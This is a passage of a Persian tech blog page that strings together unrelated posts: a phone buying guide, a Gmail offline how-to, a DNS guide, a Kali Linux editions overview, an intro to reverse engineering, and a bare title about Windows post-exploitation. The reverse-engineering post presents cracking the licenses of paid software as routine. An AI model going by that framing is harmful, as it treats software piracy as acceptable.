با افزایش قیمت ارز در ماه‌های اخیر دیگر به سختی می‌توان از برند سامسونگ در محدوده 2-3 میلیون تومان گزینه مناسبی یافت، اما Galaxy J7 Pro کماکان جزو بهترین گزینه‌های میان‌رده از این برند کره‌ای است. علت معرفی J7 Pro در میان انبوهی از مدل‌های چینی چه بسا ارزان‌تر و کارآمدتر، نمایشگر فوق‌‌العاده J7 Pro است که آن را برای تماشای فیلم و عکس در این رده قیمتی بی رقیب‌ می‌کند. همچنین J7 Pro دو اسلات سیم‌کارت و اسلات کارت حافظه مجزا دارد و به لطف پردازنده کم‌مصرف و باتری 3600 میلی آمپری شارژدهی فوق‌العاده‌ای هم خواهد داشت.

J7-Pro.png


Xiaomi Mi Max 3 64GB

3 میلیون و 500 هزار تومان بدون گارانتی

نوبتی هم باشد نوبت افرادی‌ است که چیزی مابین یک گوشی و تبلت می‌خواهند. شیائومی سه سالی است که با معرفی و عرضه مدل Mi Max پاسخ این نیاز را به خوبی می‌دهد. مدل Mi Max 3 با یک نمایشگر بزرگ 6.9 اینچی و دو دوربین و چیپ‌ست قدرتمند Snapdragon 636 و یک باتری غول آسا 5500 میلی آمپری گزینه‌ای نیست که به سادگی از کنار آن عبور کنید. باتری Mi Max 3 به خوبی بیش از دو روز دوام می‌آورد و به لطف فناوری Quick Charge 3 به سرعت هم شارژ می‌شود.

Mi-Max-3.png


Honor 8X 128GB

3 میلیون و 150 هزار تومان بدون گارانتی

پیشنهاد بعدی ما باز هم از برند آنر است. مدل جدید Honor 8x که جایگزین مدل موفقHonor 7x است، به خوبی از سوی این برند چینی ارتقا یافته است. این گوشی زیبا با نمایشگر 5.6 اینچی FullHD+ و چیپ‌ست جدید و قدرتمند Kirin 710 با 128 گیگابایت حافظه داخلی و حافظه رم 6 گیگابایتی، دوربین دوگانه 20 مگاپیکسلی و سلفی 16 مگاپیکسلی و باتری 3750 میلی آمپری با دو اسلات سیم کارت و اسلات کارت حافظه جداگانه بدون شک یک گوشی مدرن و خوش قیمت محسوب می‌شود.

Honor-8x.png


Xiaomi Mi 8 SE 64GB

3میلیون و 400 هزار تومان بدون گارانتی

باز هم پیشنهاد از شیائومی داریم! چندی پیش شیائومی با معرفی رده پرچمدار Mi 8 یک مدل ضعیف‌تر از این گوشی را با امکانات کاملی به نام Mi 8 SE معرفی کرد. Mi 8 SE با داشتن نمایشگر 5.88 اینچی از نوع SuperAMOLED و چیپ‌ست جدید Snapdragon 710 و 4 گیگابایت حافظه رم و 64 گیگابایت فضای ذخیره‌سازی از گزینه‌های بسیار وسوسه‌ انگیز است. سیستم دوربین دوگانه 12 و 5 مگاپیکسلی و سلفی 20 مگاپیکسلی در کنار رابط USB Type Cو سنسور مادون قرمز یک گزینه ایده‌آل برای تماشای فیلم و مالتی مدیا محسوب می‌شود.

Mi-8-SE.png


Huawei Nova 3 128GB

5 میلیون و 600 هزار تومان بدون گارانتی

هواوی با معرفی مدل P20 Lite که به Nova 3e نیز شناخته می‌شود، به سری نوا جان تازه‌ای داد و پس از آن با اضافه کردن دو مدل دیگر که شامل Nova 3 و بالاترین مدل از این سری می‌شود، این خانواده را قدرتمندتر از گذشته کرد.

Nova 3 را به سختی می‌توان یک میان‌رده نامید، زیرا تمامی مشخصات لازم برای یک گوشی رده بالا بودن را در خود جای داده است. نوا 3 با طراحی بسیار زیبای خود و رنگ استثناییTwilight در کنار چیپ‌ست قدرتمند Kirin 970 و 128 گیگابایت حافظه داخلی به همراه دو دوربین 16 و 24 مگاپیکسلی و سلفی 24 و 2 مگاپیکسلی یک انتخاب بی نظیر به شمار می‌رود. هواوی برای کامل کردن هرچه بیشتر این گوشی، سیستم هوش مصنوعی و تشخیص سوژه را به دوربین‌هایش آورده است. نوا 3 همچنین به سیستم تشخیص چهره بر اساس مادون قرمز نیز مجهز شده است. نوا 3 با مشخصاتی که دارد جزو مقرون به صرفه‌ترین گوشی‌های رده بالا در بازار است.

Nova3.png


Xiaomi Mi 8 128GB

5 میلیون و 800 هزار تومان بدون گارانتی

پیشنهاد بعدی ما باز هم از شیائومی است. شیائومی در حقیقت کاری به جزء ساخت گوشی‌های خوش قیمت با کیفیت بالا و امکانات استثنایی بلد نیست! Mi 8 پرچمدار سال 2018 شیائومی از مشخصات بسیار خوب و قیمتی خوب‌تر برخوردار است. تجهیز به آخرین چیپ‌ست کوالکام یعنی Snapdragon 845 و 6 گیگابایت حافظه رم و 128 گیگابایت حافظه ذخیره‌سازی به همراه نمایشگر 6.2 اینچی بسیار با کیفیت از نوع SuperAMOLED حرفی برای گفتن باقی نمی‌گذارد. دو دوربین 12 مگاپیکسلی با زوم 2 برابری اپتیکال و سلفی 20 مگاپیکسلی و بهره‌مندی از سیستم تشخیص چهره مادون قرمز از دیگر مشخصات آن است. باتری این گوشی 3400 میلی آمپری بوده و از فناوری شارژ سریع نسخه 4 کوالکام بهره‌مند است.

Mi-8.png


OnePlus 6 128GB

8 میلیون و 400 هزار تومان بدون گارانتی

برای اولین بار است که سعی می‌کنیم به شما یک پیشنهاد از وان پلاس بدهیم. وان پلاس 6 پرچمدار فعلی این برند تازه‌ وارد اما توانمند چینی است که به ویژگی‌های بسیار خوبی مجهز شده و یکی از سریعترین گوشی‌های فعلی بازار به شمار می‌رود. نسخه 128 گیگابایتی این گوشی به همراه 8 گیگابایت حافظه رم در کنار چیپ‌ست قدرتمند Snapdragon 845 شکی از سریع‌ بودن این گوشی باقی نمی‌گذارد. نمایشگر 6.28 اینچی از نوع Optic AMOLED هم حکایت از ایده‌آل بودن تصاویر به نمایش درآمده در آن دارد. بطور کلی وان پلاس 6 یک گوشی اندرویدی با چاشنی سرعت است. دوربین‌های دوگانه باکیفیت 16 و 20 مگاپیکسلی و سلفی 16 مگاپیکسلی هم نوید از یک مجموعه دوربین توانمند می‌‌دهند.

OnePlus6.png


Samsung Galaxy Note 9 128GB

9 میلیون و 350 هزار تومان بدون گارانتی

گزینه بعدی ما از سامسونگ است. گلکسی نوت 9 جدیدترین پرچمدار سامسونگ است و بتازگی وارد بازار ایران شده است. در بدو ورود این گوشی به ایران برچسب قیمت 17 میلیون تومانی را شاهد بودیم اما اکنون این نرخ متعادل‌تر شده و از زهر آن کاسته شده است. مهمترین ویژگی گلکسی نوت 9 قلم جدید S Pen است که اکنون به همراه ده‌ها ویژگی قبلی خود به بلوتوث هم مجهز شده و به عنوان یک ریموت کنترل عمل می‌کند. در کنار آن دو دوربین پیشرفته 12 مگاپیکسلی با ساختار دیافراگم متغیر و سلفی 8 مگاپیکسلی و چیپ‌ست قدرتمند اگزینوت 9810 به همراه 128 گیگابایت فضای ذخیره‌سازی و 6 گیگابایت حافظه رم جزو پیشنهاد‌های اعلاء از سامسونگ به شمار می‌رود. باتری ضعیف نوت 8 نیز در نوت 9 با یک باتری 4000 میلی آمپری تعویض شده و مدت بیشتری شما را همراهی می‌کند. فراموش نکنید نوت 9 سامسونگ یکی از بهترین نمایشگرهای موبایل ساخته شده تاکنون را به همراه دارد.

Galaxy-Note-9.png


Apple iPhone X 64GB

13 میلیون تومان با گارانتی

گزینه پیشنهادی آخر ما طبق معمول از اپل است. به دلیل افزایش شدید نرخ دلار و بالا رفتن غیر منطقی بهای این گوشی‌ها دیگر به صرفه نیست که به سراغ آیفون‌ 8 و 8 پلاس رفت. اگر بودجه کافی و توجیه منطقی برای خرید آیفون با این قیمت‌ها دارید بهتر است یکراست به سراغ iPhone X بروید. اگرچه یکسال از عرضه این مدل آیفون می‌گذرد اما به دلیل اختلاف فاحش با مدل آیفون 8 و همچنین اختلاف اندک با iPhone XS خرید iPhone X نسخه 64 گیگابایتی نسبت به همه ارجحیت دارد.

iPhone-X.png

گوگل Gmail آفلاین را عرضه کرد؛ زندگی تحت وب را در آغوش بگیرید

شاید شما نیز این دست نظریات را شنیده باشید که دنیای نرم‎افزارهای دسکتاپ رو به افول و نابودی است. در واقع با گسترش اینترنت شاید بسیاری از افراد نیازی به نرم‌افزارهای دسکتاپ نداشته باشند و بتوانند همه امور خود را تحت وب انجام دهند. Gmail یکی از این امکانات است که قصد دارد همه چیز را به درون مرورگر بیاورد؛ حتی زمانی که به اینترنت دسترسی ندارید.

اینکه همیشه و همه جا اینترنت در دسترس ما باشد در حال حاضر بیشتر شبیه یک آرزوی زیباست ولی باید بگوییم که دور از دسترس نیست و با گسترش شبکه‌‎های مخابراتی مسلماً تا کمتر از 10 سال آینده جایی روی کره زمین نخواهد بود که نتوان در آنجا به اینترنت وصل شد.

با این حال در بسیاری مواقع ما به اینترنت دسترسی نداریم و امکان جدیدی که گوگل برای سرویس محبوب Gmail در نظر گرفته همین است که بتوانیم حتی در مواقعی که به اینترنت دسترسی نداریم، از آن استفاده کنیم. در واقع گوگل وب اپلیکیشن Gmail را به نحوی توسعه داده که بتوان به صورت آفلاین نیز از آن استفاده کرد.

با این حال نباید انتظار داشته باشید که بتوان از همه امکانات آن در حالت آفلاین استفاده کرد. برای مثال شما می‌توانید بخش مهمی از ایمیل‌ها خود را در هنگامی که به اینترنت متصل هستید دانلود کنید تا زمانی که آفلاین شدید نیز بتوانید از آنها استفاده کنید ولی ارسال ایمیل و مواردی که نیاز به تبادل دوباره اطلاعات با اینترنت دارد طبیعتاً در این حالت امکان پذیر نخواهد بود.

اما چطور می‌توان این قابلیت را فعال کرد؟

برای این منظور ابتدا باید به Gmail خود مراجعه کنید. سپس وارد بخش Settings شده و به تب Offline مراجعه کنید. در نظر داشته باشید که برای استفاده از این قابلیت در حال حاضر فعلاً فقط باید از مرورگر گوگل کروم نسخه 61 به بالاتر استفاده کنید.

Gmail-offline-1.jpg

در این مرحله چک باکس مربوط به گزینه Enable Offline را می‌زنید و کار تقریباً تمام است. در این حالت شما می‌‎توانید ایمیل‌‎های خود را در بازه زمانی مشخص شده ذخیره کنید و بعد از اینکه ارتباط‌تان از اینترنت قطع شد نیز خواهید توانست از آن استفاده کنید.

Gmail-offline-2.jpg

البته در این مرحله این قابلیت نیز وجود دارد که مشخص کنید بتوان از چه مکان‌هایی که به Gmail خود متصل شده‌اید به این قابلیت دسترسی داشت.

گوگل پیشنهاد می‌کند که Gmail را به عنوان یک بوک مارک با زدن دکمه‌‎های Ctrl+D ذخیره کنید و بعد از آن نیز با افزودن این آدرس مانند یک میانبر و اتمام تنظیمات، Gmail مانند یک نرم‌‎افزار می‌‎تواند در منوی Taskbar کامپیوتر شما جای گرفته و حالا شما یک نرم‌‎افزار Gmail آفلاین و بسیار کاربردی خواهید داشت.


DNS چیست و چرا باید همین حالا آن را تغییر بدهید؟ (+ معرفی بهترین سرویس‌های DNS)

تقریباً هر آنچه که بر روی اینترنت وجود دارد با یک درخواست DNS شروع می‌شود. DNS کتابچه آدرس‌های اینترنتی است. هنگامی که بر روی یک لینک کلیک می‌کنید، تلگرام را باز می‌کنید یا ایمیل می‌فرستید، اولین کاری که دستگاه مورد استفاده شما انجام می‌دهد مراجعه به کتابچه راهنمای DNS است.

اگر نمی‌دانید DNS چیست یا تاکنون اقدام به تغییر آن نکرده‌اید، باید بگوییم شما در حال استفاده از DNS پیش فرض شرکت ارائه دهنده اینترنت (ISP) تان هستید که متأسفانه این کار معایبی دارد. اولین عیب DNS های پیش فرض امکان ثبت و پایش تمامی فعالیت های اینترنتی شما است، حتی بازدید از وب سایت‌های رمزنگاری شده یا اپلیکیشن های امن هم بی فایده است. همچنین ممکن است علایق و فعالیت‌های شما مورد تحلیل قرار بگیرد و از آن برای نمایش تبلیغاتی که می‌توانند برای شما جذاب باشند استفاده شود. اما DNS های پیش فرض یک عیب بزرگ دیگر نیز دارند و آن سرعت پاسخ‌دهی پایین است که می‌تواند علی رغم پهنای باند بالا ارتباط اینترنتی، به تأخیر در بارگذاری صفحات و اجرای برنامه‌های اینترنتی بیانجامد.

هرچند لزوماً ISP ها به فعالیت‌های شما سرک نمی‌کشند، اما هنگامی که از DNS های پیش فرض آنها استفاده می‌کنید، عملاً این امکان را به آنها می‌دهید. باید تاکید کرد استفاده از DNS پیش فرض ISP ها هیچ مزیت خاصی ندارد و با تغییر آن به یک DNS ثالث، از مزایایی چون حریم خصوصی محافظت شده و سرعت پاسخ‌دهی بهتر برخوردار می‌شوید.

سریع ترین سرویس های DNS

در گذشته معروف‌ترین سرویس DNS جایگزین متعلق به گوگل بود و اگر کسی تمایلی به استفاده از DNS پیش فرض ISP خود نداشت، به گوگل سویچ می‌کرد. اما امروزه تعداد زیادی DNS رایگان در دسترس است که مزایای بیشتری دارند. برای نمونه می‌توانند مانع از بارگذاری محتواهای هرزه نگاری شوند یا از بارگذاری لینک‌های مخرب جلوگیری می‌کنند. برخی دیگر از آنها امکان نظارت بر فعالیت‌های اینترنتی و وضع محدودیت‌هایی را می‌دهند، برای نمونه می‌توانید یک سرویس یا وب سایت خاص را مسدود کنید. دسته دیگری نیز وجود دارند که از طریق مسدودسازی آدرس‌های اینترنتی و صفحات مخرب، مانع از آلوده شدن سیستم و شبکه شما می‌شوند.

در ادامه به معرفی بهترین سرویس‌های DNS کاملاً مجانی می‌پردازیم که می‌توانند امنیت و سرعت ارتباط اینترنتی شما را بهبود بخشند. اما اگر نمی‌دانید چگونه DNS مودم، روتر، کامپیوتر یا گوشی و تبلت خود را تغییر دهید، هیچ نگران نباشید.
بهترین سرویس های DNS پیشنهادی
این‌ها بهترین سرویس‌های DNS ثالث هستند که می‌توانید استفاده می‌کنید.

انتخاب اول: Cloudflare DNS (1.1.1.1)
اولین سرویسی که به شما معرفی می‌کنیم، 1.1.1.1 نام دارد که اسم آن درست همان آدرس DNS آن است. این سرویس حاصل همکاری کمپانی مشهور Cloudflare با سازمان APNIC است. بارزترین ویژگی سرویس Cloudflare سرعت بالای آن است که به گواه DNSPerf، سریع‌ترین DNS حال حاضر دنیا است و می‌تواند به طرز چشمگیری سرعت پاسخ دهی ارتباط اینترنتی شما را افزایش دهد. همچنین این سرویس از حریم خصوصی شما محافظت می کند.

آدرس ها: 1.1.1.1 :Secondary : 1.0.0.1 - Primary

انتخاب دوم: Norton ConnectSafe
دومین سرویس پیشنهادی ما به شما، Norton ConnectSafe از کمپانی امنیتی مشهور و باسابقه Symantec است. این سرویس دارای سه سطح است که بسته به نیاز می‌توانید از سطح یک تا سه آن استفاده کنید. سطح یک یا A - Security، نه تنها بر سرعت پاسخ‌دهی ارتباط اینترنتی شما می‌افزاید، بلکه از شما در برابر بدافزارها، وب سایت‌های مخرب و وب سایت‌های کلاه‌برداری نیز محافظت می‌کند.

سطح دوم افزون بر تمامی ویژگی‌های سطح یک، وب سایت‌های حاوی محتویات هرزه نگاری را نیز مسدود می‌کند. اما سطح سوم در کنار تمامی ویژگی‌های دو سطح پیشین، محافظت تکمیلی ارائه می‌کند که  صفحات حاوی محتواهای مضر و غیر قانونی را نیز مسدود می‌کند.

آدرس ها (سطح یک): 199.85.126.10 :Secondary : 199.85.127.10 - Primary

انتخاب سوم: Comodo Secure DNS
سومین سرویس پیشنهادی ما Comodo Secure DNS از کمپانی امنیتی Comodo است. ویژگی بارز این سرویس امنیت بالاتر از طریق مسدودسازی صفحات و آدرس‌های مخرب است. این سرویس نیز سریع‌تر از DNS های پیش‌فرض است.

آدرس ها: 8.26.56.26 :Secondary : 8.20.247.20 - Primary

انتخاب چهارم: OpenDNS
چهارمین و آخرین سرویس پیشنهادی ما OpenDNS است که یکی از محبوب‌ترین و باسابقه‌ترین سرویس‌های DNS است. OpenDNS نه تنها سریع‌تر از DNS پیش فرض شما است، بلکه از شما در برابر لینک‌ها و آدرس‌های مخرب نیز محافظت می‌کند. اما ویژگی جالب‌تر OpenDNS، قابلیت‌های نظارتی و مدیریتی پیشرفته آن است. در صورتی که قصد استفاده از قابلیت‌های پیشرفته این سرویس را دارید، باید برنامه Client آن را نصب کنید و همواره بر روی سیستم شما در حال اجرا باشد تا تغییرات IP را به شبکه این سرویس اعلام کند.

امکان انتخاب سطح فیلترینگ

با نصب OpenDNS Dynamic IP updater و ایجاد یک حساب کاربری، شما به انبوهی از امکانات مدیریتی و نظارتی دسترسی خواهد داشت که می‌توان به امکان نظارت بر آدرس‌های بازدید شده، مسدود سازی دسته‌ای، مسدود سازی آدرس‌های مورد نظر و شخصی سازی پیغام‌های خطا را برشمرد. برای نمونه شما می‌توانید استفاده از پیغام رسان تلگرام را بر روی شبکه خود غیر ممکن کنید یا در هنگام تلاش برای بارگذاری یک وب سایت خاص، پیغامی را به کاربر نمایش دهید.

امکان مسدود سازی دسته ای دامنه ها و خدمات

در نظر داشته باشید نصب و اجرای برنامه Client به علت ماهیت این سرویس است و از شما جاسوسی نمی‌کند.

آدرس ها: 208.67.222.222 :Secondary : 208.67.220.220 - Primary

چگونه DNS را تغییر بدهم؟
در ادامه به نحوه تغییر DNS می‌پردازیم. اما پیش از آن باید یادآور شویم هر DNS دارای دو آدرس اصلی و ثانویه است که این دو متفاوت از یکدیگر هستند و باید هر دو آنها را وارد کنید. آدرس اصلی به عنوان Primary و آدرس ثانویه به عنوان Secondary شناخته می‌شود.

تغییر DNS در ویندوز
آسان‌ترین راه برای تغییر DNS و استفاده از سرویس مورد نظرتان، از طریق خود سیستم عامل ویندوز است. کافی است به Control Panel رفته و بر روی Network and Internet کلیک کنید. سپس Adapter فعالی که از آن برای ارتباط با اینترنت استفاده می‌کنید را پیدا کرده و بر روی Change Adapter Settings کلیک کنید. حالا به منوی Properties رفته و Internet Protocol Version 4 را انتخاب کنید.

اکنون شما با انتخاب گزینه Use The Following DNS Server addresses، می‌توانید آدرس‌های DNS مورد نظر را وارد و ذخیره کنید.

پس از تغییر آدرس‌های DNS، به منظور پاک کردن کش DNS قبلی، دستور ipconfig /flushdns را از طریق خط فرمان ویندوز اجرا کنید. همچنین شما می‌توانید از فایل آماده پیوست شده در انتهای مطلب استفاده کنید.

تغییر DNS از طریق مودم یا روتر
کافی است با وارد کردن آدرس محلی مودم یا روتر خود (برای نمونه http://192.168.1.1)، وارد صفحه مدیریت یا پنل آن شوید. سپس به دنبال گزینه DNS server یا مشابه آن بگردید. شما باید آدرس‌های سرور DNS مورد نظر را به طور مجزا در دو فیلد Primary DNS و Secondary DNS وارد و ذخیره کنید. در برخی از مودم‌ها و روتر ها (نظیر برخی محصولات TP Link)، این گزینه در قسمت LAN Settings قرار دارد و باید گزینه DHCP Server را فعال کنید تا بتوانید DNS ثالث تعریف کنید.

تغییر DNS بر روی دستگاه‌های اندرویدی
در سیستم عامل اندروید برای تغییر DNS باید IP دستگاه را به نوع ثابت یا Static تغییر دهید که قدری پیچیده است. پیشنهاد ما استفاده از اپلیکیشن DNS Changer است.

تغییر DNS در سیستم عامل iOS اپل
اپلیکیشن Settings را اجرا کرده و به بخش  Wi-Fi بروید. سپس بر روی شبکه مورد استفاده بزنید و گزینه Configure DNS و پس از آن Manual را انتخاب کنید. حالا شما می‌توانید آدرس‌های سرویس DNS مورد نظر را وارد و ذخیره کنید. در صورتی که آدرس قبلی وجود داشت، ابتدا آنها را حذف کنید.

فراموش نکنید شما می توانید DNS را بر روی وسایل دیگری چون کنسول های بازی نیز تغییر دهید، با این حال آسان ترین روش تغییر آن از طریق مودم یا روتر است، چراکه بر روی کلیه دستگاه های متصل به آن اعمال می شود.

منبع:https://www.shahrsakhtafzar.com/fa/articles-guides/internet-operator/16573-best-dns-services-2018-setup-guide-windows-10-android-ios-modem-router

هک و امنیت با پایتون جلسه اول – ساخت ابزاری شبیه Dnslookup

Dnslookup چیست؟

برای اینکه بدونم Dnslookup چی هست، ابتدا باید بدونیم که خود dns چی هستش؟ برای آشنایی کامل با dns، پیشنهاد میکنم حتمااین لینک را مطالعه کنید. خب حالا بعد از فهمیدن کار دی ان اس، میتونیم Dnslookup رو بررسی کنیم. Dnslookup اطلاعات کاملی از یک هاست رو برای ما نشون میده که این اطلاعات شامل ادرس ایپی هاست و نام وب سرور های آن میباشد.

در ادامه با زبان برنامه نویسی پایتون اسکریپتی رو خواهیم نوشت که کار Dnslookup رو برای ما انجام میده. در این اسکریپت ازکتابخانه های sys و socket پایتون استفاده میکنیم.

مشاهده ویدیو آموزشی مربوط به اسکریپت Dnslookup

نمایشگر ویدیو
00:00
00:37
08:54


https://kaliboys.com/python-penetration-testing-part1/

تفاوت نسخه های کالی لینوکس چیست؟

یکی از محبوب ترین سیستم عامل های متخصصین امنیت و هکرها، کالی لینوکس میباشد که اکثر ابزارهای هکینگ را در خود دارد.احتمالا شروع کار با کالی لینوکس برای یک مبتدی که اولین بار است سراغ لینوکس می آید کمی ساخت باشد. میتوان گفت که این مشکلات از همان اول شروع میشود که کاربر برای دانلود کالی لینوکس به صفحه دانلود kalilinux مراجعه میکند. زیرا در این صفحه بیش از 10 گزینه دانلود وجود دارد.

انواع نسخه های کالی لینوکس برای دانلود

خب با مشاهده تصویر بالا، حتما این سوال به ذهن شما هم اومده که این نسخه ها چه تفاوت هایی با هم دارند؟ و کدومش به درد شما میخوره تا بتونید دانلودش کنید؟ در ادامه به بررسی هر یک از این نسخه ها خواهیم پرداخت. در حالت کلی این نسخه ها به صورت زیر میباشند:

  • کالی لینوکس Light Armhf
  • کالی لینوکس Mate
  • نسخه معمولی Kali Linux
  • کالی لینوکس Lxde
  • کالی لینوکس Light
  • کالی لینوکس E17
  • کالی لینوکس Xfce
  • کالی لینوکس Kde
  • کالی لینوکس NetHunter

دقیقا مثل بقیه سیستم عامل ها، کالی لینوکس نیز نسخه های 64 بیت و 32 بیت دارد که شما طبق پردازنده سیستم خود انتخاب میکنید.

لینک های دانلود نیز به دو صورت هستند که HTTP یک پیوند منظم به یک تصویر ISO bootable است و Torrent یک پیوند به یک فایل تورنت است که با آن می توانید فایل ISO کالی لینوکس را بارگیری کنید.

تفاوت نسخه های لینوکس کالی چیست؟

حال بررسی میکنیم که تفاوت بین نسخه های کالی لینوکس در چیست. تقریبا همه آنها (به جز Light) توسط محیط دسکتاپ متمایز هستند. به طوری که شما می توانید خود را در یک اتمسفر تصور کنید. در ادامه تصاویری از تمام نسخه های Kali لینوکس را مشاهده میکنید.

کالی لینوکس نسخه معمولی

محیط گنوم در کالی لینوکس

در این نسخه محیط گنوم، اصلی ترین محیط کار در کالی لینوکس است که به صورت پیشفرض بر روی نسخه های معمولی Kali Linux نصب میباشد.

کالی لینوکس نسخه Kde

کالی لینوکس نسخه Kde

این محیط برای سفارشی سازی، ویجت های مختلف و پلاگین های مختلف مفید است.

کالی لینوکس نسخه Mate

کالی لینوکس نسخه Mate

در حقیقت، نسخه mate همان GNOME 2 است که به روز رسانی شده است. انتقال به GNOME 3 باعث تغییرات بسیاری شد که همه پذیرفته نشدند. بنابراین، توسعه دهندگان که با مفهوم GNOME 3 اختلاف نظر داشتند، گنوم 2 را به چنگ انداختند و آن را Mate نامیدند. این محیط هنوز هم به روز می شود، احتمالا کلاسیک و شاید کمی قدیمی شده است.

کالی لینوکس نسخه Xfce

کالی لینوکس نسخه Xfce

این نسخه دارای محیط سبک است و نیازمند منبع نیست. و برای رایانه های کم قدرت (قدیمی) توصیه می شوند.

کالی لینوکس نسخه Lxde

کالی لینوکس نسخه Lxde

این نسخه نیز مانند نسخه Xfce سبک بوده و مناسب سیستم های قدیمی میباشد.

کالی لینوکس نسخه E17

کالی لینوکس نسخه E17

محیط e17 یک محیط مشکی و پررنگ میباشد. این محیط برای علاقه مندان به محیط تاریک مناسب است.

کالی لینوکس نسخه Light

کالی لینوکس نسخه Light

این نسخه با دسکتاپ Xfce همراه است، تفاوتشان این است که محیط لایت چندین ابزار مهم دارد. این گزینه می تواند نقطه شروع خوبی برای ایجاد توزیع خود شما باشد، که تنها ابزارهایی را که نیاز دارید را نصب کنید. به همین دلیل، سیستم فضای دیسک کمتری مصرف خواهد کرد و در به روز رسانی ها خیلی سریع خواهد بود.

کالی لینوکس NetHunter

کالی لینوکس NetHunter

و در نهایت، کالی لینوکس نسخه NetHunter قرار دارد که یک نسخه ویژه برای تلفن های همراه است. دانلود nethunter

امیدوارم که از این مطلب آموزشی لذت کافی رو برده باشید و در دانلود نسخه های لینوکس مشکلی براتون به وجود نیاد. پیشنهاد ما دانلود نسخه معمولی لینوکس میباشد.

مقاله ورود به دنیای مهندسی معکوس

ورود به دنیای مهندسی معکوس و باینری

مهندسی معکوس چیست؟

مهندسی معکوس یکی از مقوله های بسیار مهم برای تست نفوذ می باشد، زیرا برای (به اصطلاح) هک کردن هر چیزی، اول باید بدونیم که چطوری کار میکنه.
مهندسی معکوس فرآیندی برای درک نحوه ی کار کرد داخلی و ساخت یک چیز می باشد، حالا چه یک جاروبرقی باشد، چه یک cpu، چه یک سیستم عامل و چه یک برنامه ای مثل Chrome Browser. در دنیای سایبری مهندسی معکوس معمولا به معکوس کردن یک برنامه کامپایل شده برای درک کردن نحوه دقیق کارکرد داخلی آن گفته میشود. در این پست به برنامه هایی که با زبان C نوشته میشن اکتفا میکنیم و بیشتر در لینوکس. به موارد اختصاصی ویندوز، سایر زبان های برنامه نویسی در پست های دیگه خواهیم پرداخت.

مهندسی معکوس به چه پیش زمینه هایی نیاز دارد؟

  1. تسلط به assembly در معماری هدف که معمولا IA64 می باشند، و ARM و MIPS برای موبایل ها و embbeded سیستم ها.
  2. برنامه نویسی C و ++C

خب بهتره اول از همه بپردازیم به اینکه کامپایل کردن چیست؟ کامپایل کردن درست مثل ترجمه کردن است، در کامپایل کردن یک کد برنامه کامپایلر اون کد رو نسبت به ساختارهای تعریف شده تبدیل به یک ساختار قابل فهم برای cpu میکنه. بعد از اون لینکر قطعات ترجمه شده رو به هم وصل میکنه و پک کننده نتیجه رو به یک فایل اجرایی در میاره.
از طریق ابزارها شما میتونید اون محتویات رو به شکل قابل درک تری شامل segment های مختلف، آدرس ها و کد اسمبلی اون برنامه رو ببینید، که البته اون کد رو خود ابزارها میسازن و hint میدن. برای مهندسی معکوس شما باید اون کدها و داده ها و متاداده ها رو بخونید و طرح control flow برای آن کد ترسیم کرده و اون رو درک کنید. چند سگمنت خیلی مهم وجود دارن که از همه پرکاربردترن:

  • .text: که کد به زبان ماشین در اینجا ذخیره میشه
  • .data: که داده ها در اینجا ذخیره میشن
  • .bss: که حافظه برای متغیرهای global و uninitialized می باشد
  • .plt: که نام و آدرس routine ها رو نگه میداره.

همیشه یه آدرس بعنوان entry point قرار داده میشه که اغلب با برچسب یا همون label بنام _start شناخته میشه. در برنامه های C که کامپایل میشن توی این قسمت کارهایی از قبیل load کردن کتابخونه ها، تخصیص و init حافظه و یکسری کارهای دیگه انجام میشه و بعد تابع main شما صدا زده میشه.

برای مهندسی معکوس کردن به شخصه معمولا یطرف صفحه کد assembly یا شبه کد C که با ابزارها گرفتم رو میزارم و یه طرف دیگه یه ادیتور (vim!!!) باز میکنم شروع میکنم یه شبه کد خوانا و قابل درک برای خودم بنویسم یا نکات رو یادداشت کنم. به شما هم همین پیشنهاد رو میکنم.

کاربردهای مهندسی معکوس چی هست؟

میتوان گفت یکی از شاخه های پرکاربرد و غیر تکراریه علم سایبری، مهندسی معکوس هست که هر روزه نیاز به آن بیشتر احساس میشود.

  • Malware reverse engineering (کاربرد در فارنزیک بدافزارها)
  • Software reverse engineering (شکستن الگوریتم های رمزنگاری نرم افزار ها)
  • Frimware reverse engineering (دستکاری واسط بین سخت افزار و نرم افزار )
  • Hardware reverse engineering (برای بهبود کارایی سخت افزاری)
  • Vulnerability Research (کشف آسیب پذیری ها)

ابزار های پرکاربرد در مهندسی معکوس

برای انجام دادن هر کاری به صورت فوری و به شکل صحیح، قطعا باید از ابزارهایی استفاده کنیم که مخصوص همون کار درست شده اند.

ابزار objdump

ابزار objdump

همونطور که از اسمش پیداست اطلاعات در مورد فایل باینری رو دامپ میکنه و میتونین کد اسمبلی هم ازش بگیرین.

ابزار gdb

ابزار gdb

اصولا یک دیباگر هست، ولی بدرد مهندسی معکوس و کشف اسیب پذیری ها هم کاربرد دارد.

ابزار IDA

ابزار IDA

ابزاری بسیار قوی و گرافیکی برای مهندسی معکوس که قابلیت دیباگ، ادیت، نقشه control flow کشیدن و خیلی امکانات دیگه رو داره.

ابزار GHIDRA

ابزار GHIDRA

برنامه ای که اخیرا سازمان NSA در دسترس عموم قرار داده، که البته بنده هنوز باهاش کار نکردم.

ابزار radare2

ابزار radare2

درست مثل IDA بسیار قوی هستش، هدف از ساختش کارهای فارنزیک بوده که بعدا تبدیل شده به یک ابزار فوق العاده قوی برای مهندسی معکوس و دیباگ. البته هنوز هم برای manipulation روی هر فایل باینری میتونین ازش استفاده کنین.

ابزار readelf

ابزار readelf

همونطور که از اسمش پیداست برای تحلیل فایل های ELF بکار میره، باهاش میتونین تمام داده ها و متاداده های یک فایل elf رو نگاه کنید.

ابزار hexedit

ابزار hexedit

یک ابزار خیلی خوب برای خواندن و ویرایش فایل در حالت باینری. بعضی وقت ها باید توی 0 و 1 ها رفت…

نمونه ای از مهندسی معکوس

به عنوان مثال برای مهندسی معکوس سخت افزاری، میتونیم به پهباد RQ170 آمریکایی اشاره کنیم که توسط سپاه پاسداران انقلاب اسلامی ایران به زمین نشانده شد و در حال حاضر چندین مورد از آن به صورت مهندسی معکوس طراحی و ساخته شده اند.

به عنوان مثال مهندسی معکوس نرم افزاری، میتوانیم به تمامی برنامه های پولی اشاره کنیم که امروزه ما از آنها به صورت رایگان استفاده میکنیم. اکثر این نرم افزارها برای فعال سازی خود نیاز به لایسنس یا … دارند که از طریق مهندسی معکوس راه فعال سازی نرم افزار را پیدا میکنند.

منابع پیشنهادی برای یادگیری

  • کتاب Reversing از Eldad Eliam
  • کتاب Hacking: the art of exploitation فصل های اول
  • ساختار فایل elf
  • یادگیری از مثال ها و نمونه ها: ctf writeups
  • منابع تمرین: چالش های سایت root-me.org

دستورات مهم یک هکر برای بهره برداری از ویندوز-Windows Post Exploitation

